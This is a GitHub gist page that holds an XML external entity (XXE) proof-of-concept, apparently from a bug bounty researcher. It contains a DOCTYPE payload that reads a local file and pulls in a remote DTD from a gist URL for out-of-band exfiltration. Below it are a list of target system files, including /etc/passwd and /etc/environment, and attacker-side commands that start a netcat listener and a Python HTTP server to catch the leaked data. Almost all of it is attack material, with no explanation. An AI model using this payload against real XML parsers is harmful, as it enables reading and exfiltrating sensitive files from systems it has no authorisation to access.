Last active
April 22, 2018 09:05
-
-
Save pranav1hivarekar/94cd88bcee2e5797e91763fcbdae0501 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="ISO-8859-1"?> | |
| <!DOCTYPE roottag [ | |
| <!ENTITY % file SYSTEM "file:////Users/coolboss/Google Drive/BugBounty/confidential/POCs/xxe/xxe-example/test.txt"> | |
| <!ENTITY % dtd SYSTEM "https://gist.githubusercontent.com/pranav1hivarekar/41de45f2a16a99d9ec311bbc26e17887/raw/2322ab460a5bc32cf1a9dd1226758d9c0e293773/mynew.dtd"> | |
| %dtd;]> | |
| file:///somefile.txt | |
| file:///etc/environment | |
| file:///etc/issue | |
| file:///etc/passwd | |
| file:///sys/power/image_size | |
| root@test:~# sudo nc -lvp 1337 | |
| root@test:~# sudo python -m SimpleHTTPServer 80 | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment